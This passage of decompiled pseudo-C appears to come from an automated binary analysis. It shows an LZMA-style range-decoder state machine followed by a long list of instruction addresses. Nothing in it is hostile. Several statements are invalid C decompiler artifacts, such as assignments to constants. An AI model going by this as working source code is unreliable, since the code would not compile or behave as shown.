								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                    0x00000000
                                                                                                    0x0040647d
                                                                                                    0x0040647d
                                                                                                    0x00406481
                                                                                                    0x00406538
                                                                                                    0x0040653b
                                                                                                    0x00406547
                                                                                                    0x00406428
                                                                                                    0x00406428
                                                                                                    0x0040642b
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x004067a0
                                                                                                    0x004067a0
                                                                                                    0x004067a6
                                                                                                    0x004067ac
                                                                                                    0x004067b2
                                                                                                    0x004067cc
                                                                                                    0x004067cf
                                                                                                    0x004067d5
                                                                                                    0x004067e0
                                                                                                    0x004067e2
                                                                                                    0x004067b4
                                                                                                    0x004067b4
                                                                                                    0x004067c3
                                                                                                    0x004067c7
                                                                                                    0x004067c7
                                                                                                    0x004067ec
                                                                                                    0x00406813
                                                                                                    0x00406813
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00000000
                                                                                                    0x004067ee
                                                                                                    0x004067ee
                                                                                                    0x004067f2
                                                                                                    0x004069a1
                                                                                                    0x00000000
                                                                                                    0x004069a1
                                                                                                    0x004067fe
                                                                                                    0x00406805
                                                                                                    0x0040680d
                                                                                                    0x00406810
                                                                                                    0x00000000
                                                                                                    0x00406810
                                                                                                    0x00406487
                                                                                                    0x0040648b
                                                                                                    0x004069cc
                                                                                                    0x004069cc
                                                                                                    0x004069cf
                                                                                                    0x004069d3
                                                                                                    0x004069d3
                                                                                                    0x00406491
                                                                                                    0x00406497
                                                                                                    0x0040649a
                                                                                                    0x0040649e
                                                                                                    0x004064a1
                                                                                                    0x004064a5
                                                                                                    0x0040696b
                                                                                                    0x004069b7
                                                                                                    0x004069bf
                                                                                                    0x004069c6
                                                                                                    0x004069c8
                                                                                                    0x00000000
                                                                                                    0x004069c8
                                                                                                    0x004064ab
                                                                                                    0x004064ae
                                                                                                    0x004064b4
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b9
                                                                                                    0x004064bc
                                                                                                    0x004064bf
                                                                                                    0x004064c2
                                                                                                    0x004064c5
                                                                                                    0x004064c8
                                                                                                    0x004064c9
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064ce
                                                                                                    0x004064d1
                                                                                                    0x004064d4
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064da
                                                                                                    0x004064dc
                                                                                                    0x004064dc
                                                                                                    0x004064df
                                                                                                    0x004064df
                                                                                                    0x004064df
                                                                                                    0x00405fb5
                                                                                                    0x00405fb5
                                                                                                    0x00405fbe
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fc4
                                                                                                    0x00000000
                                                                                                    0x00405fcf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fd8
                                                                                                    0x00405fdb
                                                                                                    0x00405fde
                                                                                                    0x00405fe2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fe8
                                                                                                    0x00405feb
                                                                                                    0x00405fed
                                                                                                    0x00405fee
                                                                                                    0x00405ff1
                                                                                                    0x00405ff3
                                                                                                    0x00405ff4
                                                                                                    0x00405ff6
                                                                                                    0x00405ff9
                                                                                                    0x00405ffe
                                                                                                    0x00406003
                                                                                                    0x0040600c
                                                                                                    0x0040601f
                                                                                                    0x00406022
                                                                                                    0x0040602e
                                                                                                    0x00406056
                                                                                                    0x00406058
                                                                                                    0x00406066
                                                                                                    0x00406066
                                                                                                    0x0040606a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040605a
                                                                                                    0x0040605a
                                                                                                    0x0040605d
                                                                                                    0x0040605e
                                                                                                    0x0040605e
                                                                                                    0x00000000
                                                                                                    0x0040605a
                                                                                                    0x00406034
                                                                                                    0x00406039
                                                                                                    0x00406039
                                                                                                    0x00406042
                                                                                                    0x0040604a
                                                                                                    0x0040604d
                                                                                                    0x00000000
                                                                                                    0x00406053
                                                                                                    0x00406053
                                                                                                    0x00000000
                                                                                                    0x00406053
                                                                                                    0x00000000
                                                                                                    0x00406070
                                                                                                    0x00406070
                                                                                                    0x00406074
                                                                                                    0x00406920
                                                                                                    0x00000000
                                                                                                    0x00406920
                                                                                                    0x0040607d
                                                                                                    0x0040608d
                                                                                                    0x00406090
                                                                                                    0x00406093
                                                                                                    0x00406093
                                                                                                    0x00406093
                                                                                                    0x00406096
                                                                                                    0x0040609a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040609c
                                                                                                    0x004060a2
                                                                                                    0x004060cc
                                                                                                    0x004060d2
                                                                                                    0x004060d9
                                                                                                    0x00000000
                                                                                                    0x004060d9
                                                                                                    0x004060a8
                                                                                                    0x004060ab
                                                                                                    0x004060b0
                                                                                                    0x004060b0
                                                                                                    0x004060bb
                                                                                                    0x004060c3
                                                                                                    0x004060c6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040610b
                                                                                                    0x00406111
                                                                                                    0x00406114
                                                                                                    0x00406121
                                                                                                    0x00406129
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004060e0
                                                                                                    0x004060e0
                                                                                                    0x004060e4
                                                                                                    0x0040692f
                                                                                                    0x00000000
                                                                                                    0x0040692f
                                                                                                    0x004060f0
                                                                                                    0x004060fb
                                                                                                    0x004060fb
                                                                                                    0x004060fb
                                                                                                    0x004060fe
                                                                                                    0x00406101
                                                                                                    0x00406104
                                                                                                    0x00406109
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406131
                                                                                                    0x00406133
                                                                                                    0x00406136
                                                                                                    0x004061a7
                                                                                                    0x004061aa
                                                                                                    0x004061ad
                                                                                                    0x004061b4
                                                                                                    0x004061be
                                                                                                    0x00000000
                                                                                                    0x004061be
                                                                                                    0x00406138
                                                                                                    0x0040613c
                                                                                                    0x0040613f
                                                                                                    0x00406141
                                                                                                    0x00406144
                                                                                                    0x00406147
                                                                                                    0x00406149
                                                                                                    0x0040614c
                                                                                                    0x0040614e
                                                                                                    0x00406153
                                                                                                    0x00406156
                                                                                                    0x00406159
                                                                                                    0x0040615d
                                                                                                    0x00406164
                                                                                                    0x00406167
                                                                                                    0x0040616e
                                                                                                    0x00406172
                                                                                                    0x0040617a
                                                                                                    0x0040617a
                                                                                                    0x0040617a
                                                                                                    0x00406174
                                                                                                    0x00406174
                                                                                                    0x00406174
                                                                                                    0x00406169
                                                                                                    0x00406169
                                                                                                    0x00406169
                                                                                                    0x0040617e
                                                                                                    0x00406181
                                                                                                    0x0040619f
                                                                                                    0x004061a1
                                                                                                    0x00000000
                                                                                                    0x00406183
                                                                                                    0x00406183
                                                                                                    0x00406186
                                                                                                    0x00406189
                                                                                                    0x0040618c
                                                                                                    0x0040618e
                                                                                                    0x0040618e
                                                                                                    0x0040618e
                                                                                                    0x00406191
                                                                                                    0x00406194
                                                                                                    0x00406196
                                                                                                    0x00406197
                                                                                                    0x0040619a
                                                                                                    0x00000000
                                                                                                    0x0040619a
                                                                                                    0x00000000
                                                                                                    0x004063d0
                                                                                                    0x004063d4
                                                                                                    0x004063f2
                                                                                                    0x004063f5
                                                                                                    0x004063fc
                                                                                                    0x004063ff
                                                                                                    0x00406402
                                                                                                    0x00406405
                                                                                                    0x00406408
                                                                                                    0x0040640b
                                                                                                    0x0040640d
                                                                                                    0x00406414
                                                                                                    0x00406415
                                                                                                    0x00406417
                                                                                                    0x0040641a
                                                                                                    0x0040641d
                                                                                                    0x00406420
                                                                                                    0x00406420
                                                                                                    0x00406425
                                                                                                    0x00000000
                                                                                                    0x00406425
                                                                                                    0x004063d6
                                                                                                    0x004063d9
                                                                                                    0x004063dc
                                                                                                    0x004063e6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040643a
                                                                                                    0x0040643e
                                                                                                    0x00406461
                                                                                                    0x00406464
                                                                                                    0x00406467
                                                                                                    0x00406471
                                                                                                    0x00406440
                                                                                                    0x00406440
                                                                                                    0x00406443
                                                                                                    0x00406446
                                                                                                    0x00406449
                                                                                                    0x00406456
